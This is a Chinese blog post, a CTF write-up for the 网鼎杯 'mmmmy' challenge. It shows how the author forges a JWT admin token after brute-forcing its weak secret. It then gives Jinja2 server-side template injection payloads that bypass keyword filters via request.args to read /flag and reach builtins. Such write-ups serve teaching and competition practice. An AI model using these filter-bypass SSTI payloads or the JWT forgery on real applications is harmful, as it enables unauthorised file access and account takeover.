<!DOCTYPE html><html><head><meta name="generator" content="Hexo 3.8.0"><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><meta name="description" content="网鼎杯第三场 mmmmy writeup"><meta name="keywords" content="writeup,python,网鼎杯"><meta name="author" content="4uuu Nya"><meta name="copyright" content="4uuu Nya"><title>网鼎杯第三场 mmmmy writeup | 4uuu Nya's Blog</title><link rel="shortcut icon" href="/melody-favicon.ico"><link rel="stylesheet" href="/css/index.css?version=1.6.1"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/font-awesome@latest/css/font-awesome.min.css?version=1.6.1"><link rel="dns-prefetch" href="https://cdn.staticfile.org"><link rel="dns-prefetch" href="https://cdn.bootcss.com"><link rel="dns-prefetch" href="https://creativecommons.org"><script>var GLOBAL_CONFIG = { 
  root: '/',
  algolia: undefined,
  localSearch: undefined,
  copy: {
    success: 'Copy successfully',
    error: 'Copy error',
    noSupport: 'The browser does not support'
  }
} </script></head><body><i class="fa fa-arrow-right" id="toggle-sidebar" aria-hidden="true"></i><div id="sidebar"><div class="author-info"><div class="author-info__avatar text-center"><img src="/img/avatar.png"></div><div class="author-info__name text-center">4uuu Nya</div><div class="author-info__description text-center">愿你我即可以朝九晚五，也能够浪迹天涯</div><hr><div class="author-info-articles"><a class="author-info-articles__archives article-meta" href="/archives"><span class="pull-left">Articles</span><span class="pull-right">20</span></a><a class="author-info-articles__tags article-meta" href="/tags"><span class="pull-left">Tags</span><span class="pull-right">34</span></a><a class="author-info-articles__categories article-meta" href="/categories"><span class="pull-left">Categories</span><span class="pull-right">2</span></a></div></div></div><div id="content-outer"><div id="top-container" style="background-image: url(/img/top_img.png)"><div id="page-header"><span class="pull-left"> <a id="site-name" href="/">4uuu Nya's Blog</a></span><i class="fa fa-bars toggle-menu pull-right" aria-hidden="true"></i><span class="pull-right menus"><a class="site-page" href="/">Home</a><a class="site-page" href="/archives">Archives</a><a class="site-page" href="/categories">Categories</a><a class="site-page" href="/about">About</a><a class="site-page" href="/links">Links</a></span></div><div id="post-info"><div id="post-title">网鼎杯第三场 mmmmy writeup</div><div id="post-meta"><time class="post-meta__date"><i class="fa fa-calendar" aria-hidden="true"></i> 2018-08-28</time><span class="post-meta__separator">|</span><i class="fa fa-inbox post-meta__icon" aria-hidden="true"></i><a class="post-meta__categories" href="/categories/technology/">technology</a></div></div></div><div class="layout" id="content-inner"><article id="post"><div class="article-container" id="post-content"><p>只给了一个登录，任意用户名和密码都可以登录， <code>admin</code> 账号会提示 <code>nononono</code></p>
<p>任意账号登录后发现有个留言系统，点击后提示只有 <code>admin</code> 用户才可以进行留言 ( 这里一开始还以为是XSS Orz</p>
<p>思考怎么拿到admin这个账号的登录权限，因为没有注册，登录处也没有可攻击的地方，后来查看cookie的时候发现有个 <code>token</code> 的键值，又是 JWT，但是这个和 <code>i_am_admin</code> 不一样的是没有地方可以得到 <code>secret</code>，于是尝试爆破，得到secret为<code>6a423</code></p>
<p><img src="https://static-4.secbox.cn/20180828103015.png" alt></p>
<p>然后伪造身份成为admin</p>
<p><img src="https://static-4.secbox.cn/20180828103047.png" alt></p>
<p>点开留言功能后突然就有点懵逼了，这不像是一个正常的留言系统。 但是发现输入的东西都会原原本本地打印在页面上，于是猜测这是一个SSTI</p>
<p>测试后发现过滤了很多东西，比如<code>&#39;</code>，<code>&quot;</code>，<code>os</code>，<code>_</code>，<code>{{</code> 只要出现了这些关键字，直接就打印None，太狠了</p>
<p>这里过滤了 <code>{{</code> ，其实还可以使用 <code>{%</code>，比如 <code>{% if 1 %}1{%endif%}</code>，会打印1</p>
<p>然后来思考一下需要绕过的地方，首先 <code>__</code> 被过滤，我们可以考虑使用 <code>[]</code> 结合 <code>request</code>来进行绕过，比如 <code>{% if ()[request.args.a]%}</code> ，url中 <code>/bbs?a=__class__</code></p>
<p>很快能构造出来一个读取flag的payload，</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&#123;% <span class="keyword">if</span> ()[request.args.a][request.args.b][request.args.c]()[request.args.d](<span class="number">40</span>)(request.args.e).read()[<span class="number">0</span>:<span class="number">1</span>]==chr(<span class="number">102</span>) %&#125;~<span class="number">4</span>uuu~&#123;%endif%&#125;</span><br><span class="line"></span><br><span class="line">a=__class__&amp;b=__base__&amp;c=__subclasses___&amp;d=pop&amp;e=/flag</span><br></pre></td></tr></table></figure>
<p>很快也能发现GG了，因为报500错误，这里考虑是没有chr这个函数，那么如法炮制获取chr函数</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&#123;%set chr=()[request.args.a][request.args.b][request.args.c]()[<span class="number">59</span>][request.args.a1][request.args.a2][request.args.a3].chr %&#125;</span><br><span class="line"></span><br><span class="line">a=__class__&amp;b=__base__&amp;c=__subclasses__&amp;d=pop&amp;e=/flag&amp;a1=__init__&amp;a2=__globals__&amp;a3=__builtins__</span><br></pre></td></tr></table></figure>
<p>这时就可以开始愉快的盲注了</p>
<p><img src="https://static-4.secbox.cn/20180828120622.png" alt></p>
<hr>
<p>其实还有一种更简单的方法，不需要盲注，直接明文，使用jinja2里的print</p>
<p><img src="https://static-4.secbox.cn/20180828120411.png" alt></p>
<p>直接就打印flag了 Orz</p>
<p><img src="https://static-4.secbox.cn/20180828120727.png" alt></p>
</div></article><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">Author: </span><span class="post-copyright-info"><a href="mailto:undefined">4uuu Nya</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">Link: </span><span class="post-copyright-info"><a href="https://qvq.im/2018/08/28/网鼎杯第三场-mmmmy-writeup/">https://qvq.im/2018/08/28/网鼎杯第三场-mmmmy-writeup/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">Copyright Notice: </span><span class="post-copyright-info">All articles in this blog are licensed under <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/">CC BY-NC-SA 4.0</a> unless stating additionally.</span></div></div><div class="post-meta__tag-list"><a class="post-meta__tags" href="/tags/writeup/">writeup</a><a class="post-meta__tags" href="/tags/python/">python</a><a class="post-meta__tags" href="/tags/网鼎杯/">网鼎杯</a></div><div class="social-share"></div><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/social-share.js@1.0.16/dist/css/share.min.css"><script src="https://cdn.jsdelivr.net/npm/social-share.js@1.0.16/dist/js/social-share.min.js"></script><nav id="pagination"><div class="prev-post pull-left"><a href="/2018/09/03/noxCTF-2018-几个misc的writeup/"><i class="fa fa-chevron-left">  </i><span>noxCTF 2018 几个misc的writeup</span></a></div><div class="next-post pull-right"><a href="/2018/05/14/拟态防御赛easy-upload出题思路与writeup/"><span>拟态防御赛easy_upload出题思路与writeup</span><i class="fa fa-chevron-right"></i></a></div></nav></div></div><footer class="footer-bg" style="background-image: url(/img/top_img.png)"><div class="layout" id="footer"><div class="copyright">&copy;2015 - 2019 By 4uuu Nya</div><div class="framework-info"><span>Driven - </span><a href="http://hexo.io"><span>Hexo</span></a><span class="footer-separator">|</span><span>Theme - </span><a href="https://github.com/Molunerfinn/hexo-theme-melody"><span>Melody</span></a></div><div class="busuanzi"><script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script><span id="busuanzi_container_page_pv"><i class="fa fa-file-o"></i><span id="busuanzi_value_page_pv"></span><span></span></span></div></div></footer><i class="fa fa-arrow-up" id="go-up" aria-hidden="true"></i><script src="https://cdn.jsdelivr.net/npm/animejs@latest/anime.min.js"></script><script src="https://cdn.jsdelivr.net/npm/jquery@latest/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-animate@latest/velocity.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-ui-pack@latest/velocity.ui.min.js"></script><script src="/js/utils.js?version=1.6.1"></script><script src="/js/fancybox.js?version=1.6.1"></script><script src="/js/sidebar.js?version=1.6.1"></script><script src="/js/copy.js?version=1.6.1"></script><script src="/js/fireworks.js?version=1.6.1"></script><script src="/js/transition.js?version=1.6.1"></script><script src="/js/scroll.js?version=1.6.1"></script><script src="/js/head.js?version=1.6.1"></script><script>if(/Android|webOS|iPhone|iPod|BlackBerry/i.test(navigator.userAgent)) {
  $('#nav').addClass('is-mobile')
  $('footer').addClass('is-mobile')
}</script></body></html>